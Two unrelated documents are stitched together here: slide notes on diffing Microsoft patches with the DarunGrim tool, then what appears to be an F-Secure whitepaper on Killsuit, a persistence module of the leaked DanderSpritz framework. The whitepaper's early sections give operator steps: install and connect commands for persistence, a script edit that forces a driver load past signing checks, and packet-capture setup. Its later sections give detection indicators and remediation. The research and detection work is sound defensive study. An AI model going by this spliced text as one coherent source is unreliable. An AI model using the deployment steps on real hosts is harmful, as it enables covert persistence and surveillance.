CVE-2010-0806 Patch Analysis
Function Level Analysis
● So we just follow the control flow from the red block
and we can see that esi is eventually set as return
value(eax).
● We can guess that the patch is about sanitizing return value
when some condition is not met or something.
The Problems with
Current Binary Diffing Tools
● Managing files are boring job.
● Downloading patches
● Storing old binaries/ Loading the files manually
● How do we know which function has security updates,
not feature updates?
● Just go through every modified functions?
– How about if the modified functions are too many?
The Solution = DarunGrim 3
● Bin Collector
● Binary Managing Functionality
● Automatic patch download and extraction
● Supports Microsoft Binaries
● Will support other major vendors soon
● Security Implication Score
● Shows you what functions have more security related
patches inside it.
● Web Interface
● User friendly
● By clicking through and you get the diffing results
Architecture Comparison
DarunGrim 2
Diffing
Engine
Database
(sqlite)
IDA
Windows
GUI
Architecture Comparison
DarunGrim 3
Diffing
Engine
Database
(sqlite)
IDA
Database
Python
Interface
Diffing
Engine
Python
Interface
Web Console
Windows
GUI
Bin Collector
Binary
Storage
Performing Diffing
● Interactive
● Non-Interactive
Performing Diffing: Interactive
● Using DarunGrim2.exe UI
●
Just put the path for each binary and DarunGrim2.exe will do the rest of the job.
● DarunGrim2.exe + Two IDA sessions
●
First launch DarunGrim2.exe
●
Launch two IDA sessions
●
First run DarunGrim2 plugin from the original binary
●
Secondly run DarunGrim2 plugin from the patched binary
●
DarunGrim2.exe will analyze the data that is collected through shared memory
● Using DarunGrim Web Console: a DarunGrim 3 Way
●
User friendly user interface
●
Includes "Bin Collector"/”Security Implication Score” support
Performing Diffing: Non-Interactive
● Using DarunGrim2C.exe command line tool
●
Handy, Batch-able, Quick
● Using DarunGrim Python Interface: a DarunGrim 3
Way
●
Handy, Batch-able, Quick, Really Scriptable
Diffing Engine
Python Interface
import DarunGrimEngine
DarunGrimEngine.DiffFile( unpatched_filename, patched_filename,
output_filename, log_filename, ida_path
)
●Perfoms diassemblying using IDA
●Runs as a background process
●Runs DarunGrim IDA plugin automatically
●Runs the DiffEngine automatically on the files
Database
Python Interface
import DarunGrimDatabaseWrapper
database = DarunGrimDatabaseWrapper.Database( filename )
for function_match_info in database.GetFunctionMatchInfo():
if function_match_info.non_match_count_for_the_source > 0 or
function_match_info.non_match_count_for_the_target > 0:
print function_match_info.source_function_name +
hex(function_match_info.source_address) + '\t',
print function_match_info.target_function_name +
hex(function_match_info.target_address) + '\t',
print str(function_match_info.block_type) + '\t',
print str(function_match_info.type) + '\t',
print str( function_match_info.match_rate ) + "%" + '\t',
print database.GetFunctionDisasmLinesMap( function_match_info.source_file_id,
function_match_info.source_address )
print database.GetMatchMapForFunction( function_match_info.source_file_id,
function_match_info.source_address )
Bin Collector
● Binary collection & consolidation system
● Toolkit for constructing binary library
● It is managed through Web Console
● It exposes some python interface, so it's scriptable if you
want
● The whole code is written in Python
● It maintains indexes and version information on the
binary files from the vendors.
● Download and extract patches automatically
● Currently limited functionality
● Currently it supports Microsoft binaries
● Adobe, Oracle binaries will be supported soon
Bin Collector
Collecting Binaries Automagically
● It visits each vendors patch pages
● Use mechanize python package to scrap MS patch pages
● Use BeautifulSoup to parse the html pages
● It extracts and archives binary files
● Use sqlalchemy to index the files
● Use PE version information to determine store location
● <Company Name>\<File Name>\<Version Name>
● You can make your own archive of binaries in more
organized way
Web Console Work Flow
Select Vendor
We only support Microsoft right now.
We are going to support Oracle and Adobe soon.
Web Console Work Flow
Select Patch Name
Web Console Work Flow
Select OS
Web Console Work Flow
Select a File
GDR(General Distribution): a binary marked as GDR contains only
security related changes that have been made to the binary
QFE(Quick Fix Engineering)/LDR(Limited Distribution Release): a
binary marked as QFE/LDR contains both security related changes
that have been made to the binaryas well as any functionality
changes that have been made to it.
Web Console Work Flow
Initiate Diffing
The unpatched file is automagically guessed based on the file name and version string.
Web Console Work Flow
Check the results
Web Console Work Flow
Check the results
Reading Results
● Locate security patches as quickly as possible
● Sometimes the diff results are not clear because of a
lot of noises.
● The noise is caused by
● Feature updates
● Code cleanup
● Refactoring
● Compiler option change
● Compiler change
Identifying Security Patches
● Not all patches are security patches
● Sometimes it's like finding needles in the sand
● We need a way for locating patches with strong
security implication
Identifying Security Patches
Security Implication Score
● DarunGrim 3 provides script interface to the Diffing
Engine
● DarunGrim 3 provides basic set of pattern matching
● We calculate Security Implication Score using this
Python interface
● The pattern matching should be easy to extend as the
researcher get to know new patterns
● You can add new patterns if you want.
Examples
● Examples for each vulnerability classes.
● DarunGrim2 and DarunGrim3 examples are shown.
● Security Implication Scores are shown for some
examples.
Stack Based Buffer Overflow:
MS06-070
Stack Based Buffer Overflow:
MS06-070/_NetpManageIPCConnect@16
Stack Based Buffer Overflow:
Signatures
● Pattern matching for string length checking routines is
a good sign for stack or heap based overflow.
● There are variations of string length check routines.
● strlen, wcslen, _mbslen, _mbstrlen
Stack Based Buffer Overflow(Logic
Error): MS08-067
● Conficker worm exploited this vulnerability to
propagate through internal network.
● Easy target for binary diffing
● only 2 functions changed.
● One is a change in calling convention.
● The other is the function that has the vulnerability
Stack Based Buffer Overflow(Logic
Error): MS08-067
Stack Based Buffer Overflow(Logic
Error): MS08-067
Stack Based Buffer Overflow(Logic
Error): MS08-067
Stack Based Buffer Overflow(Logic
Error): MS08-067
Stack Based Buffer Overflow(Logic
Error): MS08-067
StringCchCopyW
http://msdn.microsoft.com/en-us/library/ms647527%28VS.85%29.aspx
Stack Based Buffer Overflow:
Signatures
● Pattern matching for safe string manipulation functions
are good sign for buffer overflow patches.
● Strsafe Functions
–
StringCbCat, StringCbCatEx, StringCbCatN, StringCbCatNEx, StringCbCopy, StringCbCopyEx,
StringCbCopyN, StringCbCopyNEx, StringCbGets, StringCbGetsEx, StringCbLength,
StringCbPrintf, StringCbPrintfEx, StringCbVPrintf, StringCbVPrintfEx, StringCchCat,
StringCchCatEx, StringCchCatN, StringCchCatNEx, StringCchCopy, StringCchCopyEx,
StringCchCopyN, StringCchCopyNEx, StringCchGets, StringCchGetsEx, StringCchLength,
StringCchPrintf, StringCchPrintfEx, StringCchVPrintf, StringCchVPrintfEx
● Other Safe String Manipulation Functions
– strcpy_s, wcscpy_s, _mbscpy_s
– strcat_s, wcscat_s, _mbscat_s
– strncat_s, _strncat_s_l, wcsncat_s, _wcsncat_s_l, _mbsncat_s, _mbsncat_s_l
– strncpy_s, _strncpy_s_l, wcsncpy_s, _wcsncpy_s_l, _mbsncpy_s, _mbsncpy_s_l
– sprintf_s, _sprintf_s_l, swprintf_s, _swprintf_s_l
Stack Based Buffer Overflow:
Signatures
● Removal of unsafe string routines is a good signature.
–
strcpy, wcscpy, _mbscpy
–
strcat, wcscat, _mbscat
–
sprintf, _sprintf_l, swprintf, _swprintf_l, __swprintf_l
–
vsprintf, _vsprintf_l, vswprintf, _vswprintf_l, __vswprintf_l
–
vsnprintf, _vsnprintf, _vsnprintf_l, _vsnwprintf, _vsnwprintf_l
Integer Overflow
MS10-030
Integer Overflow
MS10-030
Integer Comparison Routine
Integer Overflow
MS10-030
Integer Overflow
Signatures
● Additional string to integer conversion functions can
be used to check sanity of an integer derived from
string.
● ULongLongToULong Function
– In case of multiplication operation is done on 32bit integer values,
it can overflow. This function can help to see if the overflow
happened.
● atoi, _atoi_l, _wtoi, _wtoi_l or StrToInt Function functions
might appear on both sides of functions.
Integer Overflow
JRE Font Manager Buffer Overflow(Sun
Alert 254571)
Original
Patched
.text:6D2C4A75 mov edi, [esp+10h]
.text:6D2C4A79 lea eax, [edi+0Ah]
.text:6D2C4A7C cmp eax, 2000000h
.text:6D2C4A81 jnb short loc_6D2C4A8D
.text:6D2C4A83 push eax ; size_t
.text:6D2C4A84 call ds:malloc
.text:6D244B06 push edi
Additiional Check:
.text:6D244B07 mov edi, [esp+10h]
.text:6D244B0B mov eax, 2000000h
.text:6D244B10 cmp edi, eax
.text:6D244B12 jnb short loc_6D244B2B
.text:6D244B14 lea ecx, [edi+0Ah]
.text:6D244B17 cmp ecx, eax
.text:6D244B19 jnb short loc_6D244B25
.text:6D244B1B push ecx ; size_t
.text:6D244B1C call ds:malloc
Integer Overflow
JRE Font Manager Buffer Overflow(Sun
Alert 254571)
Integer Overflow
Signatures
● Additional cmp x86 operation is a good sign of integer
overflow check.
● It will perform additional range check for the integer before
and after of the arithmetic operation
● Counting additional number of "cmp" instruction in
patched function might help deciding integer overflow.
Insufficient Validation of Parameters
Java Deployment Toolkit
Insufficient Validation of Parameters
Java Deployment Toolkit
● Unpatched one has whole a lot of red and yellow
blocks.
● The whole function's basic blocks have been removed.
● This is the quick fix for @taviso's 0-day.
● The function is responsible for querying registry key
for JNLPFile Shell Open key and launching it using
CreateProcessA API.
Insufficient Validation of Parameters
Signatures
● If validation of parameters are related to process
creation routine, we can check if the original or
patched function has a process creation related APIs
like CreateProcess Function in modified functions.
Invalid Argument
MS09-020:WebDav case
Orginal
Patched
Invalid Argument
MS09-020:WebDav case
Flags has changed
Original
Patched
Invalid Argument
MS09-020:WebDav case
What does flag 8 mean?
MSDN(http://msdn.microsoft.com/en-us/library/dd319072(VS.85).aspx) declares like
following:
MB_ERR_INVALID_CHARS
Windows Vista and later: The function does not drop illegal code points if
the application does not set this flag.
Windows 2000 Service Pack 4, Windows XP: Fail if an invalid input character is
encountered. If this flag is not set, the function silently drops illegal code
points. A call to GetLastError returns
ERROR_NO_UNICODE_TRANSLATION.
Invalid Argument
MS09-020:WebDav case
Broken UTF8 Heuristics?
6F0695EA mov esi, 0FDE9h
,,,,
6F069641 call ?FIsUTF8Url@@YIHPBD@Z ;
FIsUTF8Url(char const *)
6F069646 test eax, eax
if(!eax)
{
6F0695C3 xor edi, edi
6F06964A mov [ebp-124h], edi
}else
{
6F069650 cmp [ebp-124h], esi
}
...
6F0696C9 mov eax, [ebp-124h]
6F0696D5 sub eax, esi
6F0696DE neg eax
6F0696E0 sbb eax, eax
6F0696E2 and eax, 8
Insufficient Validation of Parameters
Signatures
● This issue is related to string conversion routine like
MultiByteToWideChar Function, we can check if the
modified or inserted, removed blocks have these kinds
of APIs used in it.
● If the pattern is found, it's a strong sign of invalid
parameter checks.
Use-After-Free: CVE-2010-0249-Vulnerability in Internet
Explorer Could Allow Remote Code Execution
Use-After-Free: CVE-2010-0249-Vulnerability in Internet
Explorer Could Allow Remote Code Execution
Use-After-Free: CVE-2010-0249-Vulnerability in Internet
Explorer Could Allow Remote Code Execution
Unpatched
Use-After-Free: CVE-2010-0249-Vulnerability in Internet
Explorer Could Allow Remote Code Execution
Patched
Use-After-Free: CVE-2010-0249-Vulnerability in Internet
Explorer Could Allow Remote Code Execution
Use-After-Free: CVE-2010-0249-Vulnerability in Internet
Explorer Could Allow Remote Code Execution
CTreeNode *arg_0
CTreeNode *arg_4
CTreeNode *orig_obj
2. Remove ptr
3. Add ptr
NodeAddRef
1. Add reference counter
NodeRelease
4. Release reference counter
Use-After-Free: CVE-2010-0249-Vulnerability in Internet
Explorer Could Allow Remote Code Execution
Signatures
● Original binary was missing to replace pointer for the
tree node.
● Freed node was used accidentally.
● ReplacePtr in adequate places fixed the problem
● We might use ReplacePtr pattern for use-after-free bug
in IE.
● Adding the pattern will help to find same issue later binary
diffing.
Conclusion
● Binary Diffing can benefit IPS rule writers and security
researchers
● Locating security vulnerabilities from binary can
help further binary auditing
● There are typical patterns in patches according to
their bug classes.
● Security Implication Score by DarunGrim3 helps
finding security patches out from feature updates
● The Security Implication Score logic is written in
Python and customizable on-demand.
Questions? | pdf |
KILLSUIT
RESEARCH
F-Secure Countercept Whitepaper
F-Secure | Killsuit research
2
CONTENTS
What is Killsuit and how does it work ......................................................3
What is Killsuit ...................................................................................3
How does Killsuit infect a machine ...............................................3
How does it work .............................................................................3
How to deploy and configure a KillSuit instance .........................4
Extra capabilities – Some modular functions .............................. 6
How does KillSuit install itself on a system ............................................ 9
Initial run at installation identifiers analysis .................................. 9
Hunting for the list & into the rabbit hole ....................................11
Refocus and results ........................................................................14
How to detect and remediate a KillSuit compromise ......................... 15
How to detect KillSuit installation ................................................ 15
How to remove Killsuit from your host .......................................16
Conclusion ............................................................................................... 17
Appendix ..................................................................................................18
Killsuit instance ID list ....................................................................18
Full Danderspritz driver list ...........................................................18
Registry list –
First part ..........................................................................................18
Registry list –
Second Part .....................................................................................18
Sources .....................................................................................................21
F-Secure | Killsuit research
3
WHAT IS KILLSUIT AND HOW DOES IT WORK
What is Killsuit
Killsuit (KiSu) is a modular persistence and capability mechanism employed in post-exploitation
frameworks including Danderspritz (DdSz), which was developed by The Equation Group and
leaked in April 2017 by The Shadow Brokers as part of the “Lost in Translation” leak. KiSu is used for
two reasons - it enables persistence on a host and it works as a sort of catalyst allowing specific
exploitative functions to be conducted.
How does Killsuit infect a machine
As KiSu is a post-exploitation tool it is used as part of a hands-on-keyboard attack where a
malicious actor is actively compromising a network. The DdSz exploitation framework includes
various tools including PeddleCheap (PC), a payload that can allow for a highly tuned interaction
with a compromised host. PC is a post-exploitation tool that can install KiSu instances on a host in
order to run its various capabilities as part of the attacker’s process. Although PC is loaded onto
a host typically though a tool such as DoublePulsar and as such injected into a running process,
KiSu is installed deliberately as an action of the PC payload as a post-exploitation operation.
FIGURE 01 – KILLSUIT INSTALLATION AND FUNCTION DIAGRAM
Dandersprtiz
Operator
PeddleCheap
Agent
Killsuit Instance
DarkSkyline Module
FlewAvenue Module
PeddleCheap
Persistence through
Killsuit SOTI
How does it work
KiSu is a facilitator for specific functions within the DdSz framework. As such KiSu is not a
malicious actor itself, but rather a component for other operations; it essentially works as a
local repository for installation and operation for other tools. Each instance is installed into an
encrypted database within the registry. In order to utilize the appropriate instance the operator
must “connect” to the instance and then perform relevant actions. It is worth noting that a PC
agent can only “connect” to one KiSu instance for the duration of its operation. These instances
each have their own specialized functionality associated with specific tools such as “StrangeLand”
(StLa), which is used for covert keylogging using the Strangeland keylogger; “MagicBean” (MaBe),
which is used for WiFi man-in-the-middle (MITM) attacks by installing necessary drivers for
packet injections, and many others (full list in appendix).
F-Secure | Killsuit research
4
DecibelMinute (DeMi) is believed to be the controller for KiSu installation and module
management. This framework component is seen in operation during instance/module
installations. As its name suggests, this is a stealthy mechanism that can bypass some driver
signing issues that may be encountered with installations by using the connected KiSu instance
to facilitate the process. DeMi also can install modules into an instance from the internal module
store to increase capabilities - such as FlewAvenue (FlAv), DoormanGauze (DmGz) or DarkSkyline
- which are used for the frameworks proprietary IPv4 & IPv6 network stacks and network
monitoring. However, if the related instances are removed from the host the specialised tools and
loaded modules no longer function.
How to deploy and configure a KillSuit instance
As mentioned this tool allows for customised operational configurations through its instance &
modular structure. One of the instance types allows for a persistence of the PC agent primary to
the DdSz framework operations (the PC instance type). Although there are multiple persistence
methods, the KiSu related persistence method for PC is one of the more advanced and stealthy
methods in the frameworks arsenal as it can use the SOTI bootloader.
In order to use the KiSu persistence you must first install the PC instance on the host using the
command “KiSu_install –type pc”. This installs the necessary data/packages to the host within the
encrypted registry DB to be utilised during persistence installation. Next you must connect to the
newly created instance using command “kisu_connect –type pc”. This tells the current PC agent
that we are connecting to the PC KiSu instance on the host, as previously mentioned an agent can
only connect to one instance at a time (therefore can only use one KiSu instance at a time although
you can have many installed). Now we run “pc_install”, this is what creates the persistence.
Figure 02 – Installation and connection to PC KiSu instance
This command will generate a menu with a number of options and status information. You will
see that one says “KiSu connection”, this checks that the session has an active connection to a PC
instance type on the host. If the connection is not there it will prompt whether the user wants to
install or connect to an instance, it is pretty user friendly for such a sophisticated tool.
F-Secure | Killsuit research
5
Figure 03 – Default values for persistence installation
Now you can change the load method, this has a default of “AppCompat” but we want to change
it to “KillSuit”. You will see that on selecting the option the status changes. However, one stat
is still yellow which is “Payload”. You must create a new PC payload on the host to use for the
persistence. Now one of the key things to note here is the payload level, this is a level 4 PC
payload which is relevant when trying to connect to it later. Select the payload type you want and
run through the options the same as you would have done for creating the original PC instance.
You can install a knocking trigger for this payload if you want which is a powerful triggering
mechanism, but we will talk about that another time. Once the payload is created you will be
taken back to the menu, finally with no yellow options.
Figure 04 – KiSu persistence configuration
Figure 05 – Connection level for persistence KiSu PC instance
Select installation and the script will communicate with the connected instance and install the
relevant persistence. Now you can safely reboot the machine. For reconnection, while in the PC tab
change the “connection target” port from the drop down to a level 4 connection port. If you do
not make this change you will not be able to connect to the PC instance type that is loaded at boot
on your target machine. You now have a KiSu persistence instance of PC on the target machine.
F-Secure | Killsuit research
6
Verify both installation and driver running, if both are success then you can start packet capture
activity on the target. This can be controlled through either the control mechanism or specific
scripts such as “DSky_start”. It is worth noting that the file used to store the packet captures
is in the tff (true font file) format that is also used for the SOTI persistence mechanism. Once
sufficient capture has occurred, the operator can then request to retrieve the captures which are
automatically attempted to be compiled into a pcap file for analysis.
Figure 06 – DarkSkyline configuration options for execution
Figure 07 – Executing DarkSkyline packet collection from capture session
Extra capabilities – Some modular functions
DarkSkyline
DarkSkyline (DSky) is a packet capture utility that can be installed as part of any KiSu instance by
installing the associated module from the module store. By connecting to a specific instance,
typically the PC persistence module, the operator can install the necessary module for the DSky
tool to operate. To do this the operator needs to use the command “darkskyline –method
demi” in order to specify using the DSky control mechanism in association with the KiSu control
element DeMi. As when installing persistence, the menu will display certain criteria in different
colours, if you have followed the steps correctly the “Use DecibelMinute” & “Connected” options
should both be green with the value “true”. If this is the case you can then select “install tools”
followed by “load driver”.
F-Secure | Killsuit research
7
FlewAvenue
FlewAvanue (flav) is the codename for the custom TCP/IP IPV4 stack that was created for this tool
in order to avoid detection. By installing flav you can control plugins of the custom TCP/IP stack
including packet redirection, flav dns, flav traceroute and others that are otherwise unavailable.
Figure 08 – FlewAvenue plugin status on initial PC connection
Figure 09 – Work around to override driver warning and install
When trying to install flav the operator may encounter issues related to driver signing (especially
on Windows 7 pro), even if test signing is enabled and integrity checks are disabled the tools
idiot proofing can still prevent the module from being loaded as it incorrectly decides driver
signing is still enforced. In order to circumvent this the operator can load flav as a module into a
KiSu instance, in testing you will need to edit the _FLAv.py script to achieve this due to an error.
Remove line 64 & 65 and replace with the value ‘params[Method] = “demi”’, this will force the flav
controller to comply.
F-Secure | Killsuit research
8
Once this is done ensure you are connected to an instance then run “flewavenue”, select “install
tools” then “load driver” and then verify the installation. If you check the driver status it may not
be available, if this is the case you need to restart or wait for the user to restart the host in order
for the module to be loaded at the KiSu instance restart.
Figure 10 – Verify installation showing FlewAvenue as “Available”
Once the driver is installed and available, the operator can start creating traffic redirects,
targeted redirects, packet redirects and others using commands such as “hittun”, “imr” and
“packetredirect” which format redirect commands for them.
F-Secure | Killsuit research
9
HOW DOES KILLSUIT INSTALL ITSELF ON A SYSTEM
Initial run at installation identifiers analysis
These identifying observations are made against the leaked version of KiSu made available by the
ShadowBrokers as part of the “lost in translation” shadowbroker DdSz leak (https://github.com/
misterch0c/shadowbroker).
In our research, when the PC agent starts installing KiSu it uses the internal resource library
DeMi which as stated is believed to manage the KiSu installation and associated modules on
the target. During the installation process the local agent runs a huge amount of redundant
API calls, dll loads and system operations in order to temporarily generate massive amounts
of debug information. Some of these operations have been shown to be dummies with the
supposed specific intention of exacerbating research and reversing of the tool. However, careful
examination of logs associated with these operations highlighted points of interest.
When installing to a host one of the first and last checks the agent makes is the running system
mode, primarily whether it is in setup or normal run mode. It does this by querying the registry
value “HKLM\System\Setup\SetupInProgress”, during normal operation this value is set to 0.
Alteration of this value did not affect the installation of instances, indicating this could potentially
be a dummy operation or checking for a specific value outside the standard options.
Figure 11 –Killsuit installation check for value SystemSetupInProgress (OS running mode)
Image 12 - API collection showing “systemfunction007” kernel operation in calc.exe thread
One of the noted actions is that the PC instance will make a Kernel API call for
“systemfunction007” which is used to generate NTLM hashes for encrypted communication.
Since during our testing we injected PC into a calc.exe instance, as you might expect this should
not occur and stood out a bit.
F-Secure | Killsuit research
10
Immediately following this the generated hash values are used in operations with the Kernel
crypto modules before being stored in the registry. This likely indicates the hash is used as part
of the DB encryption operation or is generated for the encrypted communication channel
operation DdSz employs. The second thing is the registry where the generated hashes were
stored, namely under “HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/OemMgmt”.
Although this looks like a legitimate registry location (as other oem related dirs are here), there is
no legitimate registry dir with this path we could discover.
Image 13 – API collection showing Unicode operation for registry keys under dir “OemMgmt”
Image 14 – Registry Edit displaying the malicious registry entries for two installed KiSu instances
Figure 15 –DoubleFeature display of Killsuit module root location
This registry directory is created at installation of the first instance and is removed when all
instances are uninstalled. All instance types have their own corresponding 36 char ID registry
entry that looks like “{982cfd3f-5789-effa-2cb5-05a3107add06}” within this directory, these
contain keys holding the stored encrypted values including the encrypted communication key
and other KiSu configuration data.
Further investigation of this location found that the path corresponded to the “KiSu Module
Root” location specified during usage of the “DoubleFeature” function of the framework. This
function is designed so that operators can quickly assess what elements have been previously
installed on a target for record keeping but also in case there are multiple operators attacking one
network. By generating a number of target machines we determined that the KiSu module root
location changes between hosts with the section “OemMgmt” varying between hosts, below is an
example of a variant module root being displayed using DoubleFeature.
F-Secure | Killsuit research
11
Through experimenting with OS version, IP address, MAC address, time of OS initialisation,
various system identification values and many other factors we were unable to determine the
variable that was used to select the masquerading registry value where the modules were stored.
Even when two separate OS instances were made with seemingly identical criteria the location
would vary, therefore concluding it must not be a standard configurable value. However, after
many attempts we began to see repetition in the location selected for installation in parts of the
path generated which led to the speculation this location is generated from two separate words
spliced together (Oem & Mgmt or Driv & Mgmt e.g). Analysis of the deployed PC operation
proved this to be the case as two strings values are observed being concatenated together and
appended to the default registry directory during installation. As such we began to work on
tracking down when the hive location was selected and where the two names were selected from
with the belief that two lists must exist within the framework.
Figure 16 –Observation of concatenation function for Killsuit module root location variable string components
Hunting for the list & into the rabbit hole
We needed to determine if the registry location was decided by the DdSz operator on the
attacker machine via received information, configured as part of the PC agent payload generation
for that host or generated by the PC agent once installed on the host. By utilising the same PC
payload on multiple hosts we were able to quickly rule out the value being coded into the payload
as reuse of the payload resulted in varying registry addresses.
Therefore we moved to the operator to examine the Alias and Commands of the framework for all
functions related to installation. From this we were able to find scripts that were directly called in
order to facilitate KiSu operations and gather a better understanding of how these functions are
processed in the framework. Essentially the GUI of the framework translated command line input
through the Alias and Command filters to the appropriate scripts, these (for KiSu) then are fed
to Dsz script files which interact with a _dsz object type which seemingly allocates, controls and
manages PC agents in the field.
F-Secure | Killsuit research
12
Examples of these scripts include “Mcl_Cmd_DiBa_Tasking.py” which handles KiSu module
installation/maintenance operations for instances, and “Mcl_Cmd_KisuComms_Tasking.pyo”
which is used to dynamically load and unload modules/drivers from an instance and initiate
connection between and agent and an instance. Both these scripts are called through the
command line and relay & format the operators input to the Dsz resource libraries to perform
operations against the agent specified, in the image below this can be seen as the command
“mcl.tasking.RpcPerformCall()”.
Figure 17 – Mcl_Cmd_KisuComms_Tasking.pyo extracted function utilising library functions with _dsz component
Figure 18 –Radare2 output for search and cross reference of data location relative to _dsz function output
By following the script commands for installation back through their associated libraries we found
the command was issued to the agent through the Dsz resource folder “mcl_platform/tasking”
library. In this and associated libraries the use of a “_dsz” import is utilised to create objects and
in order to carry out the interactions with the agents, however no corresponding library file was
found for the private library.
As this import seemed pivotal to the frameworks operations and KiSu interaction we investigated
its use within the “ddsz_core.exe” binary file by searching for any instace of any of the associated
scripts or their functions. Through this method we successfully found calls to the function “dsz_
task_perform_rpc”, by cross referencing this function we were able to uncover data locations for
related data objects.
F-Secure | Killsuit research
13
Analysis of the binary showed that the relevant data was not in the binary as standard and was
instead loaded as an external C module at runtime, making any attempt to analyse the command
functions statically impossible, therefore we moved on to dynamic analysis. Attempting to
analyse the binary dynamically produced issues as the binary is aware of debugger hooks and
automatically terminates. By hiding the debugger we were able to gain monitoring of the binary
but this led to more complications when referencing the function index table as a number
of loaded functions are dummy functions with no purpose, a static alternative to the dummy
operation seen during KiSu installation.
Further analysis of the discovered memory locations showed several variations most of which
remained empty, additionally the values seemed to be loaded and unloaded immediately after
use. From these elements it is clear that analysis of this binary was designed to be as difficult
as possible. Attempting to analyse the PC payload showed its contents to be encrypted and
impossible to analyse as deployed. We attempted to use PcPrep.exe which is included within the
framework which provides additional information on PC payloads. However, the information
listed does not include the root location and therefore was not conclusive.
Figure 19 –PcPrep.exe output for configured PeddleCheap payload and associated configuration file
F-Secure | Killsuit research
14
When trying to analyse the PC payload dynamically for operations relating to registry creating/
edit/adding, the values appear not to be loaded into the stack of the running process but
instead into the kernel in such a way which we were unable to recover. As such, due to these
complications during analysis, we were unable to find the lists for the registry locations within
the framework.
Refocus and results
As the list location eluded us we re-examined the installation process again for any further
abnormal behaviour. Careful investigation of the operations called during installation did reveal
an identifiable registry query that can be used to identify the process across hosts and is uniform.
The operation queries a default cryptography provider type within the registry, a value which
does not exist in typical systems. The value queried by the installation is “HKLM\Software\
Microsoft\Cryptography\Defaults\Provider Types\Type 023” which, without additional action
within the framework, results in “NAME NOT FOUND”. This query operation was found in every
experimental installation of a KiSu instance.
Cryptography provider types typically are the definition of cryptographic function with specific
criteria so that an encryption algorithm such as RSA can be used in various ways for different
effects. Although it is possible for a custom provider type to be defined, it is extremely unlikely
that they will be stored as part of the Microsoft defaults within the HKLM hive. Research into a
legitimate instance of the entry “Type 023” in that location generated no results.
Figure 20 –Observation of uniform Killsuiit installation activity, registry query for “Type 023” cryptography
default provider type
F-Secure | Killsuit research
15
HOW TO DETECT AND REMEDIATE A KILLSUIT
COMPROMISE
How to detect KillSuit installation
From our analysis of the installation and persistence mechanisms employed by KiSu there is a
defined list of consistent identifiers for installation. In addition to these examples we also found
an extensive list of drivers within the framework packages. This list seemed to consist of drivers
known to be used for specific legitimate applications, known pieces of malware and frameworks
components themselves including KiSu specific drivers. From the information available several of
the drivers are labelled for removal, however one driver (mpdkg32) is not labelled for removal and
should be present if any instances are installed. As such, presence of this driver or any of the other
related drivers directly indicates installation on the host. A full list of the drivers associated with
DdSz framework capabilities, including KiSu installation, can be found in the appendix.
Figure 21 –Detection methods for KillSuit stages
As such, the conclusion of our research and the specified driver list above indicates three possible
methods of detecting installation of KiSu on a monitored host. First, the unusual use of the
“systemfunction007” Kernel call followed almost immediately by registry write operations from an
executable that is not meant to perform such actions. As the operator of DdSz can designate which
running executable to reflect into this may be very difficult. By default the tool injects into lsass.exe,
therefore the Kernel call for encryption generation is not unusual. Although an identifiable criteria,
a clever operator will choose a process with such actions as standard to blend in.
Second, installation of any of the specified drivers related to KiSu in the list provided. Detection
of the installation and removal of any KiSu drivers in the list is a clear indicator of the framework
being used against a host. A scan across an estate for the presence of driver “mpdkg32” will be
a very easy way to quickly sweep for legacy installation of the tool that may not be detectable
during operation due to the lengths put in place to disguise the frameworks activity (custom TCP
channel, full encryption etc.).
Installation
Operation
“Type 023” default
cryptography provider
type registry query
Presence of any
permutation of
registry Dir in HKLM
CurrentVersion
SystemFunction007
Kernel call for NTLM
hash generation in
obscure process
KillSuit related driver
installed on the host
F-Secure | Killsuit research
16
Finally, registry operations related to installation can be monitored for to detect live attacks
or legacy installations. Sweeping/monitoring for registry keys under the HKLM matching
any permutation of the two lists provided in the appendix may lead to the detection of KiSu
installation or running operations. As this list is not certain to be conclusive this is only a partial
measure but if paired with driver monitoring should create a high certainty of the presence
of an instance on the host. However, monitoring for registry query operations against the
cryptography default provider type “Type 023” is a very confident way to detect installation
attempts on a host. If monitoring for such operations is available, the installation of a rule to
monitor for that one registry key could provide clear evidence of malicious actions as part of a
live monitoring system.
How to remove Killsuit from your host
Experimentation with remediation for KiSu showed that removal was most effective when the
encrypted DB location for the module root had been identified. Removal of this registry location
terminated all KiSu capabilities on a host including installed persistence through any of the
mechanisms available. Removal of this directory instantly terminates any KiSu operations and
removes the attacker’s capability to persist.
As the KiSu persistence method relies on a special instance being loaded and then configured
with the appropriate mechanism (typically post XP is SOTI), removal of the associated module
root disables this instance and neuters the associated PC agent on reboot.
However, this remediation is only relevant for KiSu instance on a target machine and will not
remove other persistent methods used by DdSz or other such frameworks for other payloads/
tools. Additionally, there are multiple methods to persist PC agents on a target machine and
therefore this method will not guarantee remediation of a DdSz foothold.
F-Secure | Killsuit research
17
Our research into KillSuit’s indicators of compromise at installation yielded a variety of
information, including active installation detection through the abnormal cryptographic provider
type and a semi-conclusive legacy installation detection using the registry locations collected.
Other identifiers found, although viable, are more difficult to verify and apply to live systems.
In addition to the indicators discovered, we also encountered a number of the methods put in
place by the developers to prevent analysis and their development practices. This gave a unique
insight into the level of effort and sophistication placed into this tool in order for it be successful
for as long as possible. In fact it was this complexity that prevented us from easily retrieving the
hard-coded registry installation values, although hopefully the analysis provided will give other
researchers a solid starting point for further investigation.
The analysis presented in this report focused on the 2013 version of this tooling as such any
indicators can be used to detect legacy Equation Group breaches or more recent breaches by
groups reusing legacy tooling. However it is highly likely that the Equation Group themselves
have redeveloped their tooling since the Shadowbrokers release and the indicators may no
longer apply to current breaches. As always this emphasises the need for defensive teams to
focus on continuous research, hunting and response to stay ahead of attackers.
CONCLUSION
F-Secure | Killsuit research
18
APPENDIX
Killsuit instance ID list
• PC (PeddleCheap)
• UR (UnitedRake)
• STLA (StrangeLand)
• SNUN (SnuffleUnicorn)
• WRWA (WraithWrath)
• SLSH (SleepySheriff)
• WORA (WoozyRamble)
• TTSU (TiltTsunami)
• SOKN (SoberKnave)
• MAGR (MagicGrain)
• DODA (DoubleDare)
• SAAN (SavageAngel)
• MOAN (MorbidAngel)
• DEWH (DementiaWheel)
• CHMU (ChinMusic)
• MAMO (MagicMonkey)
• MABE (MagicBean)
Full Danderspritz driver list
• "1394ohci","*** SENTRYTRIBE MENTAL ***"
• "ac98intc","*** DARKSKYLINE MENTAL ***"
• "adpkprp","*** KILLSUIT LOADER DRIVER - REMOVE ME ***"
• "adpux86","*** DARKSKYLINE MENTAL ***"
• "agentcpd","*** DEMENTIAWHEEL ***"
• "agilevpn","*** ST MENTAL *** -OR- RAS Agile VPN Driver"
